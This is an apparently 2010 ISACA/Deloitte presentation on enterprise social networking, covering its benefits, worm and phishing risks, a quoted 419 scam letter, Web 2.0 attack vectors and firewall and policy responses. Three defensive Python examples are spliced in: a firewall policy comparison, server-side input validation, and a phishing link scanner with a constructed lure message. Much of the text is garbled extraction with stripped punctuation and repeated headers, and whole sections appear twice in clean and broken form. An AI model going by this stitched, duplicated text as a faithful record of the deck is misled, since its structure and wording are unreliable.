Risks and challenges (cont)Risks and challenges (cont)
wwwisacaorg37
Risks and challenges (cont)Risks and challenges (cont)bull Example worms phishing attacks affecting social networking sites
ndash Koobface ndash targets Facebook MySpace hi5 Bebo Twitter and other sites Users are prompted to click on a URL purporting to be an update from Adobe and a worm is downloaded to the PC which looks for personal data
ndash Fbaction - Facebook phishing attack that encourages users to sign up for fbactionnet using their Facebook credentials Those credentials are then used to hijack the Facebook account
wwwisacaorg38
Risks and challenges (cont)Risks and challenges (cont)
ndash Boface - convinces users to click on a link pointing to a video resulting in a download Shortly after the download is complete the userrsquos Facebook account will be hijacked and used as a means of spamming (and propagating a worm to) all their friends
bull Common element ndash they all take advantage of the implied trust that social networking users have with each other
wwwisacaorg39
Risks and challenges (cont)Risks and challenges (cont)
ldquoHas what weve learned about writing software the last 20 years been expressed in the design of Web 20 Of course not It cant even be said to have a design If showing people what vulnerabilities can do were going to somehow encourage software developers to be more careful about programming Web 20 would not be happeningrdquo - Marcus Ranum in InfoSec Magazine May 2008
bull Trust mdash Data reliability commonly causes issues for social media in the workplace The Web has partially solved this with techniques such as inbound link counting but reputation and voting systems are starting to appear often as plug-ins for social media tools
bull May also take advantage of URL Shortening ndash bitly trim tinyurlcom etc
wwwisacaorg40
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment
wwwisacaorg41
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment (cont)
ldquoDearest Onehellip
Sorry for the nature of this email please bear with me
I am Natasha Kone a 22 year old lady now i was born on the 1st of January 1986 to the family of Kone My fatherrsquos name is Kamara Cone He was a very wealthy Gold and Cocoa Merchant based in ACCRA and ABIDJAN respectively I am their only child When I was a kid I attended a private school and things were well for me and my parents Things changed when I was in High School my mother died on the 21st October 1994 My father then took me very special and gave me motherly care As fate had it my father died last yearhelliphelliphelliphelliphelliphelliphelliprdquo- See httpwww419legalorg for more details
bull The 419 scams have evolved with the technology ndash now using LinkedIn to target specific individuals
wwwisacaorg42
Risks and challenges (cont)Risks and challenges (cont)
bull Reputation mdash Damage to company brandreputation through inappropriate comments or remarks from employeesndash Even a lack of a response may damage the brand For example XYZ Company Inc
creates a Twitter account call XYZ_Cares and then fails to use the accountndash Other examples include creating social media program but not telling the rest of the
company about it so they may be unaware of any promotions or offers being publicized
bull Copyright violation mdash Third-party material such as essays articles and photographs are used without written consent from the proprietor
bull Intellectual Property theft mdash Harder to prevent inadvertent data leakage through the one-to-many nature of Web 20 as a medium
wwwisacaorg43
Risks and challenges (cont)Risks and challenges (cont)
bull Failures in the use of Social Media mdash most companies that use Social Media donrsquot approach it the way they would with other mission critical technologyndash At best it can be said that most companies today are merely dabbling with Social
Mediahellipndash Few have approached the solution with an integrated strategy or a concrete business
case usually because they either arenrsquot fully convinced of its value or have been slowed by the security and legal issues
ndash Without a strategy and proper metrics based on a business case their projects will remain small mismanaged and likely to fail
ldquoFully half of all Social Media investments will failrdquomdash Gartner
wwwisacaorg44
Risks and challenges (cont)Risks and challenges (cont)ldquoWhen I discovered YouTube I didnt work for five days I did nothing I viewed cookie monster sings chocolate rain about 1000 timesrdquo- Michael Scott from The Office
bull Productivity mdash Users employ social media tools for nonproductive purposes such as socializing (ldquoSocial Notworkingrdquo)
httpnewsbbccouk2hibusiness8325865stm
wwwisacaorg45
Risks and challenges (cont)Risks and challenges (cont)
bull Technical Integration mdash Most organizations note that integration between individual Web 20 applications and their overall infrastructure is a major concern
ndash Sign in using your account withbull Facebook AOLbull Twitter Bloggerbull Myspace WordPressbull Yahoo Netlogbull Google OpenIDbull Windows Live ID flickr
wwwisacaorg46
Risks and challenges (cont)Risks and challenges (cont)
bull Information hoarding mdash In many industries value is placed on what an employee knows that others do not know This belief prevents data sharing
bull Quantification mdash Researchers currently face challenges quantifying social networking benefitsndash Valuation techniques include among others Beckstromrsquos law which states that mdash ldquoThe
value of a network equals the net value of each userrsquos transactions conducted through that network valued from the perspective of each user and summed for allrdquo
Or alternatively
ndash httpenwikipediaorgwikiBeckstromrsquos_law
wwwisacaorg47
Risks and challenges (cont)Risks and challenges (cont)
bull Litigation issues mdash Discrimination defamation violation of privacy and harassment are some of the potential concerns that might result in litigation issues
wwwisacaorg48
A quick word on privacyA quick word on privacy
ldquoPeople have really gotten comfortable not only sharing more information and different kinds but more openly and with more people That social norm is just something that has evolved over timerdquo
mdash Mark Zuckerberg Facebook founder
ldquoIf you have something that you donrsquot want anyone to know maybe you shouldnrsquot be doing it in the first placerdquo
mdash Eric Schmidt CEO Google Inc
wwwisacaorg49
A quick word on privacy (cont)A quick word on privacy (cont)
bull Loss of Fourth Amendment protectionbull Encryption of data storage unlikelybull Lack of encryption while data in usebull Data remanence limited attempt to address
wwwisacaorg50
Responding to the risks and challengesResponding to the risks and challenges
bull Policies and proceduresndash Acceptable use policy
bull Details how social networking sites and applications can be usedbull Define consequences for failure to comply eg ldquotermination of employment and
legal actionrdquo
bull Risk assessmentndash Establish what information is most critical to the businessndash Understand how information might become vulnerable and how to protect it
(data mapping)
wwwisacaorg51
Responding to the risks and challenges

• Education and awareness
  – Inform users of the information security risks involved and how to guard against them
    • For example, only install or run applications from trusted sources approved by the corporate IT department

Responding to the risks and challenges (cont.)

• Vulnerability assessments
  – Identifying, quantifying and prioritizing the potential vulnerabilities that social networking may present to the organization
• Firewalls
  – Historically, firewalls focused on ports, IP addresses and packets
  – But social networking applications operate on ports 80 & 443
  – Next-generation firewall technology offers granular control of social networking functionality:
    • Identify applications regardless of port, protocol, evasive tactic or SSL
    • Identify users regardless of IP address
    • Scan application content in real time
    • Visibility and policy control over application access
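The difference between the port-based rule and the application-aware rule described on this slide, as an added example that is not part of the presentation or any vendor's product code. Everything in it is constructed: the flow records, the server-name signatures that stand in for a firewall's application identification, the user-to-group mapping and the policy table. Port-based filtering allows every one of the social networking flows because they ride on 443 (or 80), while the application-aware policy decides on the identified application and the user's group, so the same LinkedIn session is allowed whether it arrives on 443 or 8443 and the Facebook game session is denied although it uses 443.

```python
"""Port-based versus application-aware policy for social networking traffic.

Added illustration, not from the presentation or any firewall vendor's code.
The flow records, the server-name signatures, the user-to-group mapping and
the policy table below are all constructed for the example.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Flow:
    user: str         # identity resolved by the firewall (directory/agent), not the IP
    src_ip: str
    dst_port: int
    server_name: str  # TLS SNI or HTTP Host header observed on the wire
    function: str     # sub-function found by content inspection: browse/chat/game/post


# Constructed signatures: server-name suffix -> application family (hypothetical)
APP_FAMILIES = {
    "facebook.com": "facebook",
    "fbcdn.net": "facebook",
    "linkedin.com": "linkedin",
    "twitter.com": "twitter",
}

# Constructed identity mapping and policy (hypothetical groups)
USER_GROUPS = {"alice": {"marketing"}, "bob": {"engineering"}, "carol": {"hr"}}
APP_POLICY = {
    "facebook:browse": {"marketing", "hr"},   # page browsing for these groups only
    "facebook:chat": set(),                   # chat leaves the company unscanned: nobody
    "facebook:game": set(),                   # games: nobody
    "linkedin:browse": {"*"},                 # everyone
    "twitter:post": {"marketing"},            # posting in the company's name: marketing only
}


def identify_application(flow: Flow) -> str:
    """Classify a flow by server name and inspected function, ignoring the port."""
    host = flow.server_name.lower()
    for suffix, family in APP_FAMILIES.items():
        if host == suffix or host.endswith("." + suffix):
            return f"{family}:{flow.function}"
    return "unknown"


def port_based_verdict(flow: Flow) -> str:
    """Legacy rule: permit outbound web on 80/443, deny everything else."""
    return "allow" if flow.dst_port in (80, 443) else "deny"


def application_aware_verdict(flow: Flow) -> str:
    """Next-generation rule: decision keyed on application and user, not port or IP."""
    allowed_groups = APP_POLICY.get(identify_application(flow))
    if allowed_groups is None:
        return "deny"                       # unclassified traffic is denied by default
    if "*" in allowed_groups:
        return "allow"
    return "allow" if USER_GROUPS.get(flow.user, set()) & allowed_groups else "deny"


# Constructed sample flows
SAMPLE_FLOWS = [
    Flow("alice", "10.0.0.5", 443, "www.facebook.com", "browse"),
    Flow("bob", "10.0.0.6", 443, "apps.facebook.com", "game"),
    Flow("bob", "10.0.0.6", 443, "www.linkedin.com", "browse"),
    Flow("carol", "10.0.0.7", 80, "twitter.com", "post"),
    Flow("bob", "10.0.0.6", 8443, "www.linkedin.com", "browse"),
]


def compare_policies(flows):
    """Return (user, application, port-based verdict, app-aware verdict) per flow."""
    return [
        (f.user, identify_application(f), port_based_verdict(f), application_aware_verdict(f))
        for f in flows
    ]


if __name__ == "__main__":
    for row in compare_policies(SAMPLE_FLOWS):
        print("%-6s %-18s port-based=%-5s app-aware=%s" % row)
```

The unknown-application default is the part worth copying: a host that merely contains a brand name (evil-facebook.com) does not match the signature and is denied rather than inheriting the brand's policy.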

What is next in the world of social networking

Where we are at today

• Enterprise social media has crossed the tipping point and is no longer considered an "emerging" technology
"The Hype Cycle": http://en.wikipedia.org/wiki/Hype_cycle

What's next in the world of social networking

• Increase in the use of mobile devices to access social networks
  – Over 600 million people will use their phone to access social networks by 2013, an increase of more than 400% over the 2009 figure of 140 million. Source: eMarketer
• Increase in frequency of access
  – Facebook mobile users are 50% more active than other users of the site
• Take your social profile with you as you travel the Web
  – For example: Facebook Connect
• Social networks will become more pervasive, broadcasting your location in geo-networking apps
  – Interaction between devices. For example, your car's navigation system will be able to learn your friend's location and provide directions to them

Some further predictions

• Some quotes on social networks
  – "Probably the greatest transformative force in our generation, absent a major war." -- Mark Zuckerberg, Facebook founder
  – "(Twitter is)... Something important that has the potential to change the world, though we have a long way to go." -- Biz Stone, Co-founder of Twitter

Q&A

Today's Presenters

Nelson Gibbs
Senior Manager
AERS - Audit & Enterprise Risk Services
Deloitte & Touche LLP
ngibbs@deloitte.com
+1 213 593 4241

Appendix

• Additional resources
  – Gopal, Raj, et al. "Web 2.0 reinvents corporate networking." Deloitte Consulting LLP (2008)
  – The Economist: A special report on social networking, January 30, 2010
  – Fraser, Matthew; Dutta, Soumitra (2008). Throwing Sheep in the Boardroom: How Online Social Networking Will Transform Your Life, Work and World
  – "Great Wall of Facebook: The Social Network's Plan to Dominate the Internet -- and Keep Google Out" by Fred Vogelstein, Wired Magazine (June 2009). http://www.wired.com/techbiz/it/magazine/17-07/ff_facebookwall
  – "The Future is Social, Not Search, Facebook COO Says" by Ryan Singel, Wired Magazine (October 2009). http://www.wired.com/epicenter/2009/10/facebook-social-2
  – British Computer Society Social Media Web site: http://www.bcs.org/socialmedia

This presentation contains general information only, and Deloitte is not, by means of this presentation, rendering accounting, business, financial, investment, legal, tax or other professional advice or services. This presentation is not a substitute for such professional advice or services, nor should it be used as a basis for any decision or action that may affect your business. Before making any decision or taking any action that may affect your business, you should consult a qualified professional advisor.

Deloitte, its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation.

Why and how companies are using social networking

Statistics on companies using social networking

Data was collected between November 2009 and January 2010 among the Fortune Global 100 companies: US = 29 companies, Europe = 48 companies, Asia-Pacific = 20 companies, Latin America = 3 companies.
Source: http://www.burson-marsteller.com/Innovation_and_insights/blogs_and_podcasts/BM_Blog/Documents/Burson-Marsteller%202010%20Global%20Social%20Media%20Check-up%20white%20paper.pdf

Companies typically adopt social media for three major benefits

1. Increase employee productivity and operational efficiencies
2. Foster creativity, innovation and collaboration
3. Enhance customer and partner relationships

Increase employee productivity and operational efficiencies

• Creates a lightweight institutional memory system for a company's intellectual assets to be easily captured, stored and accessed
• Reduces the net volume of e-mail and allows users to "pull" information at their convenience, as opposed to spending time reading through mass e-mail chains
• Creates better quality deliverables faster by drawing on the collective talents, knowledge and experiences of other employees around the world

Operational efficiencies
• A leading energy company realized approximately $250K in annual cost savings by conducting its employee conference virtually using social media

Improved reporting
• A global investment bank tightened reporting cycle times from several weeks to "about 30 seconds" per stakeholder by enabling them to submit their information directly into a team wiki and making that information instantly available to others in a rich dashboard mashup

Increase employee productivity and operational efficiencies (cont.)

• American Red Cross
  – Designed to incite discussions around issues the American Red Cross cares about and describe actions individuals can take (online or offline) to help people prevent, prepare for and respond to emergencies, and give valuable information about preventing, preparing for and responding to emergencies. http://redcrosschat.org

Increase employee productivity and operational efficiencies (cont.)

• Deloitte's DWiki
  – Provides a safe, flexible knowledge creation and information sharing environment for all Deloitte practitioners across country, practice and Deloitte organizational borders
  – Enhances the client service delivery capabilities of our Deloitte practitioners
  – Serves as a test environment for innovative concepts and solutions which expand the business interests of Deloitte

As used in this document, "Deloitte" means Deloitte LLP. Please see www.deloitte.com/us/about for a detailed description of the legal structure of Deloitte LLP and its subsidiaries.

Foster creativity, innovation and collaboration

• Harness product, process and service innovations by unlocking creativity and ideas from any area of the company
• The diverse group feedback inherent in social computing accelerates the problem-solving process and produces better solutions
• Employees create unexpected connections with one another and expand their base of knowledge, experience and circle of trusted colleagues

Product innovation
• A leading high-tech manufacturer instituted a "submit-and-vote-for-your-favorite-idea" social community with its consumers, generating over 5,000 ideas and over 300,000 votes in its first three months and subsequently identifying new product offerings

Information capture
• A federal agency created an internal wiki to bolster the capture and dissemination of mission-critical information between field agents

Foster creativity, innovation and collaboration (cont.)

• Best Buy
  – A community of Best Buy employees who convene regularly to share knowledge, best practices, frustrations, aspirations and a few jokes. Community members include everyone from recent high school graduates to semi-retirees. https://mix.blueshirtnation.com

Foster creativity, innovation and collaboration (cont.)

• Deloitte's DStreet
  – Enterprise talent networking site, changing the way we connect with each other
  – Enables another way of collaboration and community building
  – Network, build new relationships and forge successful careers
  – Learn about colleagues and interesting ways to introduce yourself
  – Identify new connection points to create a basis for meaningful conversation
  – A new way of assembling the right team

Enhance customer and partner relationships

• Opens the lines of communication beyond typical spokespeople such as marketing, sales and PR, and provides an avenue for other important stakeholders (e.g. engineers, scientists, product managers) to gather firsthand feedback from customers
• Allows customers to access help beyond traditional means, with networks that provide peer support and a user-generated knowledgebase, while monitoring customer perception
• Provides a forum for collaborative business development, education and communications with vendors, OEMs and other partners
• Allows consumers who know your products and services best to become a part of the new offering development process

Revenue growth
• A major consumer goods company improved sales by 31.5% by including customer ratings, user-generated product reviews and other social features on its online storefront, also resulting in a 40% uptick in average order value

Enhance customer and partner relationships (cont.)

• Procter & Gamble
  – Capessa launched in the "Yahoo Health" section of Yahoo.com, one of the world's leading internet destinations. Women who register with Capessa.yahoo.com have access to several topic areas, including parenting, pregnancy, weight loss, relationships, career, healthy living and care giving. http://realwomenrealadvice.com

Enhance customer and partner relationships (cont.)

• American Express
  – OPEN Forum, an online resource and networking site for business owners. The site is designed to forge meaningful business connections and provide practical, actionable information and insights from influential bloggers, industry leaders and savvy entrepreneurs. http://www.openforum.com

Enhance customer and partner relationships (cont.)

• State of Louisville, Kentucky
  – Interactive audit findings on Web site. Allows the users to discuss previous audit findings. http://www.louisvilleky.gov/InternalAudit

Enhance customer and partner relationships (cont.)

• Amazon
  – A social network for people who love books. Users are able to create a virtual shelf to show off their books, see what their friends are reading and discover new books. http://www.shelfari.com

Enhance customer and partner relationships (cont.)

• Bank of America (BofA)
  – On January 29, 2010, the Bank of America Web site was down. BofA used Twitter to keep in touch with its customers to let them know the latest update.

Risks and challenges

Risks and challenges

• Farmers and Mobsters
  – Top Facebook applications
    • Source: http://statistics.allfacebook.com/applications/leaderboard (March 2010)
    • There are now more than 500,000 active applications on the Facebook Platform

Rank  Name                    Monthly Active Users
  1   FarmVille                         82,580,911
  2   Static FBML                       46,827,021
  3   Birthday Cards                    41,904,049
  4   Café World                        30,032,716
  5   Facebook for iPhone               29,438,848
  6   Texas HoldEm Poker                28,332,917
  7   Slide FunSpace                    25,630,033
  8   Happy Aquarium (BETA)             24,915,971
  9   Mafia Wars                        24,704,179
 10   Causes                            24,317,292

Risks and challenges (cont.)

• New security concerns and attack vectors, as a result of the shift in technology through Web services that are empowering server-side core technology components, as well as Asynchronous JavaScript and XML ("AJAX") and Rich Internet Application ("RIA") clients that are enhancing client-end interfaces in the browser itself
• Top 10 Web 2.0 attack vectors: http://net-square.com/whitepapers/Top10_Web20_AV.pdf
  – Cross-site scripting ("CSS" in the paper's abbreviation; now usually written XSS) in AJAX, e.g. the "Samy worm that exploited MySpace.com's CSS flaw"
  – XML poisoning: poisoned XML blocks coming from the AJAX client
  – Malicious AJAX code execution: replay of cookies for each request
  – RSS/Atom injection: inject JavaScript into RSS feeds to generate an attack on the client browser
  – Web Services Definition Language ("WSDL") scanning and enumeration
  – Client-side validation in AJAX routines: failure to perform server-side checks
  – Web services routing issues: compromise of intermediate nodes
  – Parameter manipulation with SOAP: web services consume information and variables from SOAP
  – XPath injection in SOAP message: bypass of authentication mechanisms
  – RIA thick client binary manipulation: issues with session management
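Two items in the list above, client-side validation that is not repeated server-side and cross-site scripting through AJAX responses, illustrated with an added example that is not code from the presentation or from the referenced whitepaper. The order endpoint, its field limits and the sample requests are constructed. The handler treats the browser's checks as advisory and repeats them, rejects any field the client was never asked to supply (such as a client-computed total), and escapes every value before it is placed into the HTML fragment the AJAX caller inserts into the page.

```python
"""Server-side re-validation and output encoding for an AJAX endpoint.

Added illustration, not code from the presentation or the referenced whitepaper.
The order schema, the field limits and the sample requests are constructed.
"""
import html
import json
import re

SKU_PATTERN = re.compile(r"[A-Z0-9]{4,12}")
ALLOWED_SHIPPING = {"standard", "express"}
MAX_QTY = 10
MAX_NOTE_LEN = 200
KNOWN_FIELDS = {"sku", "qty", "shipping", "note"}


class ValidationError(ValueError):
    pass


def validate_order(payload) -> dict:
    """Repeat every check the browser script makes; any HTTP client can skip the browser script."""
    if not isinstance(payload, dict):
        raise ValidationError("JSON object expected")
    unknown = set(payload) - KNOWN_FIELDS
    if unknown:
        # A client-computed field such as "total" is never accepted; prices are recomputed server-side
        raise ValidationError("unexpected fields: " + ", ".join(sorted(unknown)))
    sku = payload.get("sku")
    if not isinstance(sku, str) or not SKU_PATTERN.fullmatch(sku):
        raise ValidationError("invalid sku")
    qty = payload.get("qty")
    if not isinstance(qty, int) or isinstance(qty, bool) or not 1 <= qty <= MAX_QTY:
        raise ValidationError("qty must be an integer between 1 and %d" % MAX_QTY)
    shipping = payload.get("shipping", "standard")
    if shipping not in ALLOWED_SHIPPING:
        raise ValidationError("invalid shipping option")
    note = payload.get("note", "")
    if not isinstance(note, str) or len(note) > MAX_NOTE_LEN:
        raise ValidationError("note too long or not a string")
    return {"sku": sku, "qty": qty, "shipping": shipping, "note": note}


def handle_order(raw_body: bytes):
    """Return (HTTP status, JSON-serialisable response body) for a POSTed order."""
    try:
        payload = json.loads(raw_body)
    except ValueError:
        return 400, {"error": "malformed JSON"}
    try:
        order = validate_order(payload)
    except ValidationError as exc:
        return 400, {"error": str(exc)}
    # The real handler sends this with Content-Type: application/json so the
    # browser never interprets the response body as HTML
    return 200, {"status": "accepted", "order": order}


def render_confirmation(order: dict) -> str:
    """HTML fragment the AJAX caller inserts into the page; every value is escaped for HTML context."""
    return '<li>SKU {sku} x {qty}, {shipping}: <span title="{note}">{note}</span></li>'.format(
        sku=html.escape(order["sku"]),
        qty=int(order["qty"]),
        shipping=html.escape(order["shipping"]),
        note=html.escape(order["note"], quote=True),  # quote=True also escapes " and ' for the attribute
    )


# Constructed sample requests
GOOD_REQUEST = b'{"sku": "AB1234", "qty": 2, "shipping": "express", "note": "leave at <door>"}'
BYPASSED_QTY = b'{"sku": "AB1234", "qty": 999}'                 # client-side max-10 check skipped
CLIENT_TOTAL = b'{"sku": "AB1234", "qty": 1, "total": 0.01}'    # client asserts its own price

if __name__ == "__main__":
    for body in (GOOD_REQUEST, BYPASSED_QTY, CLIENT_TOTAL, b"{not json"):
        print(handle_order(body))
    print(render_confirmation(handle_order(GOOD_REQUEST)[1]["order"]))
```

The same shape applies to a SOAP endpoint: the parameters arriving in the envelope are validated against a schema on the server before anything downstream consumes them, which is the control behind the "parameter manipulation with SOAP" item as well.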

Risks and challenges (cont.)

• Example worms and phishing attacks affecting social networking sites
  – Koobface: targets Facebook, MySpace, hi5, Bebo, Twitter and other sites. Users are prompted to click on a URL purporting to be an update from Adobe, and a worm is downloaded to the PC which looks for personal data
  – Fbaction: Facebook phishing attack that encourages users to sign up for fbaction.net using their Facebook credentials. Those credentials are then used to hijack the Facebook account

Risks and challenges (cont.)

  – Boface: convinces users to click on a link pointing to a video, resulting in a download. Shortly after the download is complete, the user's Facebook account will be hijacked and used as a means of spamming (and propagating a worm to) all their friends
• Common element: they all take advantage of the implied trust that social networking users have with each other

Risks and challenges (cont.)

"Has what we've learned about writing software the last 20 years been expressed in the design of Web 2.0? Of course not. It can't even be said to have a design. If showing people what vulnerabilities can do were going to somehow encourage software developers to be more careful about programming, Web 2.0 would not be happening." -- Marcus Ranum in InfoSec Magazine, May 2008

• Trust: Data reliability commonly causes issues for social media in the workplace. The Web has partially solved this with techniques such as inbound link counting, but reputation and voting systems are starting to appear, often as plug-ins for social media tools
• May also take advantage of URL shortening: bit.ly, tr.im, tinyurl.com, etc.
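A defender's check for the lure patterns that the Koobface, Fbaction and Boface descriptions on the previous slides share, extended with the URL shortening point above, as an added example that is not part of the presentation. The shortener list is the one on the slide (bit.ly, tr.im, tinyurl.com); the HTML message it scans is constructed, with a reserved .example domain standing in for a lure site. It flags links whose visible text names one site while the href goes to another, and links that hide their destination behind a shortener. The registrable-domain comparison is a crude last-two-labels approximation, not a public suffix list lookup.

```python
"""Flag lure patterns in an HTML message: URL shorteners and links whose visible
text names a different site than the real destination.

Added illustration, not from the presentation. The shortener list is taken from
the slide; the sample message and the .example lure domain are constructed.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

SHORTENERS = {"bit.ly", "tr.im", "tinyurl.com"}


class LinkCollector(HTMLParser):
    """Collect (href, visible text) for every <a> element in document order."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def host_of(url: str) -> str:
    """Lower-cased host of a URL; scheme-less text such as www.example.com is accepted."""
    if "://" not in url:
        url = "http://" + url
    return (urlparse(url).hostname or "").lower()


def site_of(url: str) -> str:
    """Crude registrable-domain approximation: the last two host labels (no public suffix list)."""
    labels = host_of(url).split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else labels[0]


def looks_like_url(text: str) -> bool:
    """Visible text a reader would take for an address: a dot, no spaces, and a scheme, slash or www."""
    t = text.lower()
    if " " in t or "." not in t:
        return False
    return "://" in t or "/" in t or t.startswith("www.")


def classify_link(href: str, text: str):
    """Return the list of findings for one link (empty when nothing is suspicious)."""
    findings = []
    if host_of(href) in SHORTENERS:
        findings.append("shortened-url")        # destination hidden behind a redirector
    if looks_like_url(text) and site_of(text) != site_of(href):
        findings.append("display-mismatch")     # text names one site, link goes to another
    return findings


def scan_message(html_body: str):
    """Return [(href, findings)] for every link that raised at least one finding."""
    collector = LinkCollector()
    collector.feed(html_body)
    results = []
    for href, text in collector.links:
        findings = classify_link(href, text)
        if findings:
            results.append((href, findings))
    return results


# Constructed sample message in the style of the lures described on the slides
SAMPLE_MESSAGE = """
<p>Hey, is this you in this video?? <a href="http://bit.ly/2x9ample">watch</a></p>
<p>Your player is out of date: <a href="http://update.adobe-flash.example">http://www.adobe.com/update</a></p>
<p>Posted from <a href="https://www.facebook.com/">Facebook</a></p>
"""

if __name__ == "__main__":
    for href, findings in scan_message(SAMPLE_MESSAGE):
        print(href, "->", ", ".join(findings))
```

A message hitting either finding is a candidate for quarantine or for a warning banner rather than an automatic block; the shortener finding in particular is common in legitimate mail, so expanding the short link server-side and re-running the same comparison on the final destination is the usual next step.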

Risks and challenges (cont.)

• More on phishing: social networks are a target-rich environment

Risks and challenges (cont.)

• More on phishing: social networks are a target-rich environment (cont.)

"Dearest One...
Sorry for the nature of this email, please bear with me.
I am Natasha Kone, a 22 year old lady now. i was born on the 1st of January 1986 to the family of Kone. My father's name is Kamara Cone. He was a very wealthy Gold and Cocoa Merchant based in ACCRA and ABIDJAN respectively. I am their only child. When I was a kid I attended a private school and things were well for me and my parents. Things changed when I was in High School, my mother died on the 21st October 1994. My father then took me very special and gave me motherly care. As fate had it my father died last year........" - See http://www.419legal.org for more details

• The 419 scams have evolved with the technology, now using LinkedIn to target specific individuals

Risks and challenges (cont.)

• Reputation: Damage to company brand/reputation through inappropriate comments or remarks from employees
  – Even a lack of a response may damage the brand. For example, XYZ Company Inc. creates a Twitter account called XYZ_Cares and then fails to use the account
  – Other examples include creating a social media program but not telling the rest of the company about it, so they may be unaware of any promotions or offers being publicized
• Copyright violation: Third-party material such as essays, articles and photographs are used without written consent from the proprietor
• Intellectual property theft: Harder to prevent inadvertent data leakage through the one-to-many nature of Web 2.0 as a medium

Risks and challenges (cont.)

• Failures in the use of social media: most companies that use social media don't approach it the way they would other mission-critical technology
  – At best, it can be said that most companies today are merely dabbling with social media...
  – Few have approached the solution with an integrated strategy or a concrete business case, usually because they either aren't fully convinced of its value or have been slowed by the security and legal issues
  – Without a strategy and proper metrics based on a business case, their projects will remain small, mismanaged and likely to fail

"Fully half of all social media investments will fail." -- Gartner

Risks and challenges (cont.)

"When I discovered YouTube, I didn't work for five days. I did nothing. I viewed 'cookie monster sings chocolate rain' about 1000 times." - Michael Scott from The Office

• Productivity: Users employ social media tools for nonproductive purposes such as socializing ("Social Notworking")
http://news.bbc.co.uk/2/hi/business/8325865.stm

Risks and challenges (cont.)

• Technical integration: Most organizations note that integration between individual Web 2.0 applications and their overall infrastructure is a major concern
  – Sign in using your account with: Facebook, Twitter, Myspace, Yahoo, Google, Windows Live ID, AOL, Blogger, WordPress, Netlog, OpenID, flickr

Risks and challenges (cont.)

• Information hoarding: In many industries, value is placed on what an employee knows that others do not know. This belief prevents data sharing
bull Quantification mdash Researchers currently face challenges quantifying social networking benefitsndash Valuation techniques include among others Beckstromrsquos law which states that mdash ldquoThe
value of a network equals the net value of each userrsquos transactions conducted through that network valued from the perspective of each user and summed for allrdquo
Or alternatively
ndash httpenwikipediaorgwikiBeckstromrsquos_law
wwwisacaorg47
Risks and challenges (cont)Risks and challenges (cont)
bull Litigation issues mdash Discrimination defamation violation of privacy and harassment are some of the potential concerns that might result in litigation issues
wwwisacaorg48
A quick word on privacyA quick word on privacy
ldquoPeople have really gotten comfortable not only sharing more information and different kinds but more openly and with more people That social norm is just something that has evolved over timerdquo
mdash Mark Zuckerberg Facebook founder
ldquoIf you have something that you donrsquot want anyone to know maybe you shouldnrsquot be doing it in the first placerdquo
mdash Eric Schmidt CEO Google Inc
wwwisacaorg49
A quick word on privacy (cont)A quick word on privacy (cont)
bull Loss of Fourth Amendment protectionbull Encryption of data storage unlikelybull Lack of encryption while data in usebull Data remanence limited attempt to address
wwwisacaorg50
Responding to the risks and challengesResponding to the risks and challenges
bull Policies and proceduresndash Acceptable use policy
bull Details how social networking sites and applications can be usedbull Define consequences for failure to comply eg ldquotermination of employment and
legal actionrdquo
bull Risk assessmentndash Establish what information is most critical to the businessndash Understand how information might become vulnerable and how to protect it
(data mapping)
wwwisacaorg51
Responding to the risks and challengesResponding to the risks and challenges
bull Education and awarenessndash Inform user of the information security risks involved and how to guard
against thembull For example only install or run applications from trusted sources approved by the
corporate IT department
wwwisacaorg52
Responding to the risks and challenges Responding to the risks and challenges (cont)(cont)
bull Vulnerability Assessmentsndash Identifying quantifying and prioritizing the potential vulnerabilities that Social
Networking may present to the organizationbull Firewalls
ndash Historically firewalls focused on ports IP addresses and packetsndash But social networking applications operate on Ports 80 amp 443ndash Next-generation firewall technology that offers granular control of social
networking functionalitybull Identify applications regardless of port protocol evasive tactic or SSLbull Identify users regardless of IP addressbull Scan application content in real-timebull Visibility and policy control over application access
wwwisacaorg53
What is next in the world of What is next in the world of social networkingsocial networking
wwwisacaorg54
Where we are at todayWhere we are at today
bull Enterprise Social Media has crossed the tipping point and is no longer considered an ldquoemergingrdquo technology
ldquoThe Hype CyclerdquohttpenwikipediaorgwikiHype_cycle
wwwisacaorg55
Whatrsquos next in the world of social Whatrsquos next in the world of social networkingnetworking
bull Increase in the use of mobile devices to access Social Networksndash Over 600 million people will use their phone to access Social Networks by
2013 and increase of more than 400 than 2009 figure of 140 millionSource mdash eMarketer
bull Increase in frequency of accessndash Facebook mobile users are 50 more active than other users of the site
bull Take your social profile with you as you travel the Webndash For example mdash Facebook Connect
bull Social Networks will become more pervasive mdash broadcasting your location in geo-networking appsndash Interaction between devices For example your carrsquos navigation system will
be able to learn your friendrsquos location and provide directions to them
wwwisacaorg56
Some further predictionsSome further predictions
bull Some quotes on social networksndash ldquoProbably the greatest transformative force in our generation absent a major
warrdquo mdash Mark Zuckerberg Facebook founderndash ldquo(Twitter is)hellip Something important that has the potential to change the
world though we have a long way to gordquo mdash Biz Stone Co-founder of Twitter
wwwisacaorg57
QampAQampA
wwwisacaorg58
Todayrsquos PresentersTodayrsquos Presenters
Nelson GibbsSenior ManagerAERS ndash Audit amp Enterprise Risk ServicesDeloitte amp Touche LLPngibbsdeloittecom+1 213 593 4241
wwwisacaorg59
AppendixAppendix
bull Additional resources ndash Gopal Raj et al ldquoWeb 20 reinvents corporate networkingrdquo Deloitte
Consulting LLP (2008)ndash The Economist mdash A special report on social networking ldquoJanuary 30 2010rdquondash Fraser Matthew Dutta Soumitra (2008) Throwing Sheep in the Boardroom
How Online Social Networking Will Transform Your Life Work and Worldndash ldquoWall of Facebook The Social Networks Plan to Dominate the Internetrdquo mdash
and Keep Google Out by Fred Vogelstein Wired Magazine (June 2009)ndash httpwwwwiredcomtechbizitmagazine17-07ff_facebookwallGreatndash ldquoThe Future is Social Not Search Facebook COO Saysrdquo by Ryan Singel
Wired Magazine (October 2009) httpwwwwiredcomepicenter200910facebook-social-2
